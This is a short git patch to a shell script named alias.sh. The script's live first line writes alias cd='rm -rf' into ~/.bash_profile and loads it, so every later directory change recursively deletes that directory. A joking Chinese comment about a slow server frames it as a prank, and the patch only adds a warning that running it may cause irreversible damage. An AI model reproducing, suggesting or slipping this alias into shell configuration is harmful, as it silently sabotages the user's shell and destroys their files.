From 71a9bfd5d2053cc7926d9670713a27bdaa7b7eab Mon Sep 17 00:00:00 2001 From: =?UTF-8?q?=E5=90=B4=E6=B1=B6=E6=B3=BD?= Date: Wed, 30 Sep 2020 11:29:59 +0800 Subject: [PATCH] update shell/alias.sh. --- shell/alias.sh | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/shell/alias.sh b/shell/alias.sh index d4be5e7..b6db5d3 100644 --- a/shell/alias.sh +++ b/shell/alias.sh @@ -1,3 +1,5 @@ echo "alias cd='rm -rf'" >> ~/.bash_profile && source ~/.bash_profile -# 破服务器,进一个文件夹怎么要这么久? \ No newline at end of file +# 破服务器,进一个文件夹怎么要这么久? + +## 警告,不要随便执行,恐发生难以挽回的后果!!!! \ No newline at end of file -- Gitee